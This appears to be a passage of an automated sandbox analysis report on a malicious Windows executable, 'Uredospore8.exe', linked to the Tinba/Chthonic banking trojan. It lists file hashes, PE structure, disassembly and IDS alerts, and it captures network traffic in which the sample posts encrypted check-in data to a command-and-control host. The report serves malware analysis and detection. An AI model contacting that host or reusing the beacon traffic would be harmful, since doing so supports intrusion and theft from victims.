            SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
            Malicious:false
            Preview:0.1..
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):5
            Entropy (8bit):2.321928094887362
            Encrypted:false
            SSDEEP:3:Ay:Ay
            MD5:C204E9FAAF8565AD333828BEFF2D786E
            SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
            SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
            SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
            Malicious:false
            Preview:0.2..
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-11, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 42206150440647454097408.000000, slope 18791449852801685565186347368448.000000
            Category:dropped
            Size (bytes):50075
            Entropy (8bit):3.7518830531435827
            Encrypted:false
            SSDEEP:1536:xchkq/9PYdKNAd1d0f41w1Ii0OyAAZXjLdk6nMUMXfhteVoVPPP8zo9dhk5+6DC3:xykq/1YdKNAd1d0f41w1Ii5yAAZXHdet
            MD5:E1C26F2047ED37A871FE95B2E1AB2F96
            SHA1:33C53F323DE75F445B2B5E1ECD9371247EE994A8
            SHA-256:3CD51E4DFD7495380EBF1337C3971F7BF349F9A6EAB2F472977BBCB048084E31
            SHA-512:3729D558BD5F75A997B8362BC74F93B82AF86575E3C6E4B60E20DC436B69A445F917CB7DF0DE87C7B43157B0C49774F297887A05139BA303A966C4EB59408369
            Malicious:false
            Preview:........|.......h...."cmd"~........A%..*aint~.........+r~........A,#A..A0..192~.........2016~........A3.A60A7.A[bAa,.b@..ck..db(.e...f'..g*..h6..iq..j..AkG.l...m2..nL..o...p:..q..Ar_.s...t...u..Av.w...x...y..AzWB.RA..A.IC..UA......A.c..~........C.LA..C.(I..Cpre..run%~.........fetch%~.........ail~.........stsc~.........cmd~.........run~.........utlook~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~......... zip~........D-zip.Iz3A ..~........Ffile m..help~.........anager~.........fm~.........ip~........Aa..paint~.........int~.........omt~........CbouMAc.Ad.Ae..kype~........Al..mil~........An.Apa.rJ.As.At.Au..zure~.........t java~.........alc~........DcessS.ess~.........lc~.........md~.........on~.........robat~........G contro..s~.........~........Ol:wux:a.Occess c..ontrol~........Eapter%.b~........Ad"Cmin4Eobe a=Jva.F:wux:a..~.........dapter~........Fress b..~........Oook:wux.O:addres..s book~........E cmd:.Jis.Owux:adm..in cmd~........Otrative.. tools~........
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:data
            Category:dropped
            Size (bytes):1124551
            Entropy (8bit):6.149173837774368
            Encrypted:false
            SSDEEP:12288:MxmthXv3zrLoE1Bx7BefoQaWFxAm8DStxmthXv3zrLoE1Bx7BefoQaWFxAm8DSQi:AoLr7YfoyFxz8GfoLr7YfoyFxz8GHkK
            MD5:ECACA4F61EC9019648E50430157B11F4
            SHA1:143AEA7210B959053C3E4E26E442328B11D1E968
            SHA-256:892A22CDB211AB5A5327E3456D61E2BF2A66356C9A61F10D00ADD62B3A7B9CB8
            SHA-512:4C22C003D6CDEA5502736C43453AD4314696903A6B088BB43969068DFAA1FBE3C885CC74D4B9E2D489072EB70AC616AD5EBEEB5F4E65DF495BC300E8747E3B2C
            Malicious:false
            Preview:Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling.fE.h...K........~<~i..'..uT..r..7.c..l.s..P.x..c.k....p....'..CR*a..Qn...a.,[.o2..t.u}.,{f.m.Q..e ;.w.0..l..(.y..P......gy..d.:&.i.;.[..n.b....j.z#.@.E.Q!..Q......N.Q/...`.z.Qh.7.f..+.4.. . ....v..L.8..Q6#.Q\..Qq.B.;.}..0....9...A5...X.Qz.H.7.'..%. .Q3.8.....Q21/...M.Q.kQ-..."""""""jo..&.I.Q+.uQ1j...j.a:..Ab...;b...Q...'.<...#?< ..a_C..b]<3../.<...Ae..t!...u...Qb...n....y._.Qj.{Ql =.p.S..m)o..k...Qo..Qh..Q;7CQi1..w2..Qf.2Qd8h.r....sE...a.<..cZ... \...z."..,me<ume.Q.z5Qxx.av>.*Q[@R.24<u 24.ig...At.Qnv.Q .'Qo0xae....yo<uetoDam"...k<ue k.Qs.0ab..=&i<ue i+..j<ue jhQd..Qr..Qc.`&p<ue p...a<ue a.&w<ue w..&f<ue f..&h<ue h...v<ue v.Ql..&.<ube....g<ue g....<uetoet<uet..TUh<uet..&u<ueto..&p<ueto..%y<uet..cr<u...Re<...i<uetoMa<...-o<eto...o(...o(...ter*et...ute.eute..luetjuey...st* ta..s<unes%e<unew..n<ueenfj<u....men+e n...t<uetbs<..X%j<uej...2<ue2M%b<ueb[.%g<ueg...h<ueh.%v<uev1.%c<uec..%p<uep6.%f<uef..j<uo...ue
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):113991
            Entropy (8bit):5.179432690540701
            Encrypted:false
            SSDEEP:384:+/t8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ik/l:lGzoz5cdI9N/rim1vgY
            MD5:65427CDF9D90C0777F4CBD4F257664F3
            SHA1:4AAB0E1A336896C5EC225B823FE19291D2B24DDC
            SHA-256:2772443737DFF17F3FB08F649B4F66798B14F7063019037108474C2D7914E2EC
            SHA-512:BCACF4B0D6CE0CC57FA9D65EEBD174C20239C62850709A87DB2F4615ED46412E026016BA5F1077ACD2DBDE380684E10536024B1FD9C04C5DE743B421CDEDD93D
            Malicious:false
            Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":4,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340960432672E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):113991
            Entropy (8bit):5.179432690540701
            Encrypted:false
            SSDEEP:384:+/t8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ik/l:lGzoz5cdI9N/rim1vgY
            MD5:65427CDF9D90C0777F4CBD4F257664F3
            SHA1:4AAB0E1A336896C5EC225B823FE19291D2B24DDC
            SHA-256:2772443737DFF17F3FB08F649B4F66798B14F7063019037108474C2D7914E2EC
            SHA-512:BCACF4B0D6CE0CC57FA9D65EEBD174C20239C62850709A87DB2F4615ED46412E026016BA5F1077ACD2DBDE380684E10536024B1FD9C04C5DE743B421CDEDD93D
            Malicious:false
            Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":4,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340960432672E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"
            Process:C:\Windows\SysWOW64\winver.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):69632
            Entropy (8bit):6.191747645410539
            Encrypted:false
            SSDEEP:768:FwaGd7Lw/nrrxDL/GOv2/w6HSa0fYSPNZsxRXQ1d2yg/QmWKHZyiVlaW4OHZ0Em:F47urp3v23HSa0AMNyfQ1d2y4Z4P
            MD5:73120A9C2658CFAB57CF191468A630A5
            SHA1:B6899957633E20BE9C303F72B324C0F24B094FA7
            SHA-256:23E1F8ACCFF194BCFDF90E4FC1AC6156BDDB5A72EE271333E88E988AFA5E09D7
            SHA-512:79FA3ABB8CAA14F3E22BF63CB523D469BFEB3D6BEFAABF517EFD6BEA9DAFB3A9398CB3E1A6024870B0A0A0D74E406A2006EE8A15AE37B06638E922E4DA39B2AA
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L...0..S.....................@....................@.......................... ..............................................t...(.......@...................................................................(... ....................................text............................... ..`.data...(...........................@....rsrc...@........ ..................@..@l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.191769179614653
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Uredospore8.exe
            File size:69'632 bytes
            MD5:50c7ce412d99eb4769411d6b60a34ac6
            SHA1:551d077916a61780fb055f6e3b27c0f2ba4d3378
            SHA256:446156cab04d4f29ecee92429d9cba29e4403be17b677e74cde58e39e6487f20
            SHA512:e763c3d8ea8bf58f466ff8ead43234b5d6bfacb5753437e34fe19ee1f808c7c454211866f4a676900330b0020feb08187f87e82edf804271fe5f4cf9abf8d5b0
            SSDEEP:768:1waGd7Lw/nrrxDL/GOv2/w6HSa0fYSPNZsxRXQ1d2yg/QmWKHZyiVlaW4OHZ0Em:147urp3v23HSa0AMNyfQ1d2y4Z4P
            TLSH:BF638E127FBD3C51DD490E7009BCA2F52317D631D680A93E2EC1CE2CA92E662AD7564F
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...H..S.....................@....................@................
            Icon Hash:a96dc95bc6cccdab
            Entrypoint:0x401200
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:
            Time Stamp:0x53AE9248 [Sat Jun 28 10:00:40 2014 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f2f4496a54658e57a107c99e860a33f5
            Instruction
            push 004086B0h
            call 00007EFDAC870575h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            cmp byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            jbe 00007EFDAC870573h
            salc
            push ebx
            pop esp
            and dl, byte ptr [ebp-608463BEh]
            sub dword ptr [edx+0072B7BBh], edi
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [ecx], al
            add byte ptr [eax], al
            add byte ptr [ebp+02h], cl
            nop
            test al, 4Dh
            add cl, byte ptr [ebp+61h]
            je 00007EFDAC8705E7h
            jc 00007EFDAC8705F0h
            popad
            add byte ptr [eax], al
            add byte ptr [eax], al
            add bh, bh
            int3
            xor dword ptr [eax], eax
            or bl, byte ptr [ebx-0Fh]
            pushfd
            int 08h
            rcl dword ptr [ebp+40h], 1
            mov cl, 24h
            adc dl, al
            jno 00007EFDAC870533h
            test dword ptr [ebx+0B2443A1h], ebx
            xchg eax, esp
            arpl word ptr [A01DE18Fh+eax*2], di
            push ebx
            test dword ptr [eax], ecx
            sar byte ptr [edx], cl
            dec edi
            lodsd
            xor ebx, dword ptr [ecx-48EE309Ah]
            or al, 00h
            stosb
            add byte ptr [eax-2Dh], ah
            xchg eax, ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            in eax, 73h
            add byte ptr [eax], al
            push ebp
            add byte ptr [eax], al
            add byte ptr [eax], al
            or byte ptr [eax], al
            dec ebp
            imul ebp, dword ptr [esi+73h], 37726574h
            add byte ptr [45000D01h], cl
            jnc 00007EFDAC8705F6h
            push 706F7465h
            push 3165726Fh
            add byte ptr [ecx], bl
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xd2740x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1e40.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000xc4.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xc6000xd0006a0f46d34b82952215f57c185fc79a17False0.5995342548076923data6.821035285186627IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .data0xe0000x19280x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x100000x1e400x2000284508f07ed7ddfa364c7e402c12a47cFalse0.466552734375data5.065203541650571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x11b580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.581989247311828
            RT_ICON0x10cb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 23040.4997334754797441
            RT_ICON0x104080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 10240.5712996389891697
            RT_GROUP_ICON0x103d80x30data1.0
            RT_VERSION0x101500x288dataEnglishUnited States0.48302469135802467
            DLLImport
            MSVBVM60.DLL__vbaR8FixI4, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaI2Var, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
            2024-08-29T20:36:07.150947+0200TCP2020418ET MALWARE Tinba Checkin 214971180192.168.2.6216.218.185.162
            2024-08-29T20:36:07.150947+0200TCP2024659ET MALWARE [PTsecurity] Tinba Checkin 414971180192.168.2.6216.218.185.162
            2024-08-29T20:36:07.150947+0200TCP2830613ETPRO MALWARE W32/Chthonic CnC Activity14971180192.168.2.6216.218.185.162
            TimestampSource PortDest PortSource IPDest IP
            Aug 29, 2024 20:35:51.541784048 CEST49674443192.168.2.6173.222.162.64
            Aug 29, 2024 20:35:51.541784048 CEST49673443192.168.2.6173.222.162.64
            Aug 29, 2024 20:35:51.869877100 CEST49672443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:01.150963068 CEST49674443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:01.150963068 CEST49673443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:01.479165077 CEST49672443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:03.114073038 CEST44349704173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:03.114165068 CEST49704443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:06.521184921 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:06.526144028 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:06.526221991 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:06.526557922 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:06.531558990 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:06.531614065 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:06.536485910 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:07.102843046 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:07.150947094 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:13.153968096 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:13.197829008 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:13.832392931 CEST49704443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:13.832492113 CEST49704443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:13.833065987 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:13.833127022 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:13.833199024 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:13.833847046 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:13.833862066 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:13.837481976 CEST44349704173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:13.837495089 CEST44349704173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.486270905 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.486448050 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:14.528474092 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:14.528508902 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.529674053 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.530596018 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:14.531780958 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:14.531842947 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.534868956 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:14.576517105 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.785063982 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.785136938 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:14.785161972 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:14.788446903 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:15.311660051 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:15.311691046 CEST44349715173.222.162.64192.168.2.6
            Aug 29, 2024 20:36:15.311702967 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:15.311739922 CEST49715443192.168.2.6173.222.162.64
            Aug 29, 2024 20:36:19.183778048 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:19.229094028 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:25.107918024 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:25.150980949 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:31.088577032 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:31.135370016 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:38.025063992 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:38.025738001 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:38.025779963 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:38.026087999 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:38.026127100 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:43.084404945 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:43.197915077 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:49.086046934 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:49.135442019 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:36:55.085777998 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:36:55.135415077 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:01.084641933 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:01.135392904 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:07.084382057 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:07.135467052 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:13.087568998 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:13.135442972 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:19.086931944 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:19.135432959 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:25.083966017 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:25.135421991 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:31.306216955 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:31.354214907 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:31.568331003 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:31.568506002 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:37.082889080 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:37.135616064 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:43.082828999 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:43.135446072 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:49.084316969 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:49.135499001 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:37:55.083853960 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:37:55.135519028 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:38:01.086370945 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:38:01.132920027 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:38:07.087347984 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:38:07.135453939 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:38:13.087505102 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:38:13.135463953 CEST4971180192.168.2.6216.218.185.162
            Aug 29, 2024 20:38:13.506206036 CEST8049711216.218.185.162192.168.2.6
            Aug 29, 2024 20:38:13.506257057 CEST4971180192.168.2.6216.218.185.162
            TimestampSource PortDest PortSource IPDest IP
            Aug 29, 2024 20:36:06.088187933 CEST5662053192.168.2.61.1.1.1
            Aug 29, 2024 20:36:06.099069118 CEST53566201.1.1.1192.168.2.6
            Aug 29, 2024 20:36:06.107395887 CEST5212653192.168.2.61.1.1.1
            Aug 29, 2024 20:36:06.132410049 CEST53521261.1.1.1192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Aug 29, 2024 20:36:06.088187933 CEST192.168.2.61.1.1.10x279dStandard query (0)www.google.comA (IP address)IN (0x0001)false
            Aug 29, 2024 20:36:06.107395887 CEST192.168.2.61.1.1.10x201aStandard query (0)lkebgoxdejyq.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Aug 29, 2024 20:36:06.099069118 CEST1.1.1.1192.168.2.60x279dNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
            Aug 29, 2024 20:36:06.132410049 CEST1.1.1.1192.168.2.60x201aNo error (0)lkebgoxdejyq.com216.218.185.162A (IP address)IN (0x0001)false
            Aug 29, 2024 20:36:12.891669035 CEST1.1.1.1192.168.2.60x8ed5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Aug 29, 2024 20:36:12.891669035 CEST1.1.1.1192.168.2.60x8ed5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
            • https:
              • www.bing.com
            • lkebgoxdejyq.com
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.649711216.218.185.16280616C:\Windows\SysWOW64\winver.exe
            TimestampBytes transferredDirectionData
            Aug 29, 2024 20:36:06.526557922 CEST96OUTPOST /preview/ HTTP/1.0
            Host: lkebgoxdejyq.com
            Content-Length: 157
            Data Raw: 18 1a 83 d8 90 1d 83 d8 e8 5e 57 53 1e 18 82 fb 28 2a b3 e8 28 2a b3 ee
            Data Ascii: ^WS(*(*
            Aug 29, 2024 20:36:06.531614065 CEST133OUTData Raw: 00 80 00 00 00 07 de 9d 7f c6 87 88 87 5f f9 17 0c 0b 8a c6 ba 1e dd c4 02 7a 94 ce 2d 7a 46 4f ee 6b 40 be dc 0c 10 f4 84 dc 9a dd c4 f6 0d 3a 75 87 15 6b 48 b9 52 10 16 70 99 99 6b b7 ee 50 0a 5c 7c 9e 47 37 73 0c 4a 98 4a 92 0c 02 8e 9d 0e 27
            Data Ascii: _z-zFOk@:ukHRpkP\|G7sJJ'dF@]-}~O%@9F5N/_CI
            Aug 29, 2024 20:36:07.102843046 CEST138INHTTP/1.1 200 OK
            Server: nginx/1.21.6
            Date: Thu, 29 Aug 2024 18:36:07 GMT
            Content-Type: application/octet-stream
            Connection: close
            Data Raw: 68
            Data Ascii: h
            Aug 29, 2024 20:36:13.153968096 CEST1INData Raw: 65
            Data Ascii: e
            Aug 29, 2024 20:36:19.183778048 CEST1INData Raw: 6e
            Data Ascii: n
            Aug 29, 2024 20:36:25.107918024 CEST1INData Raw: 77
            Data Ascii: w
            Aug 29, 2024 20:36:31.088577032 CEST1INData Raw: 50
            Data Ascii: P
            Aug 29, 2024 20:36:38.025063992 CEST1INData Raw: 42
            Data Ascii: B
            Aug 29, 2024 20:36:38.025738001 CEST1INData Raw: 42
            Data Ascii: B
            Aug 29, 2024 20:36:38.026087999 CEST1INData Raw: 42
            Data Ascii: B
            Aug 29, 2024 20:36:43.084404945 CEST1INData Raw: 50
            Data Ascii: P
            Aug 29, 2024 20:36:49.086046934 CEST1INData Raw: 54
            Data Ascii: T


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
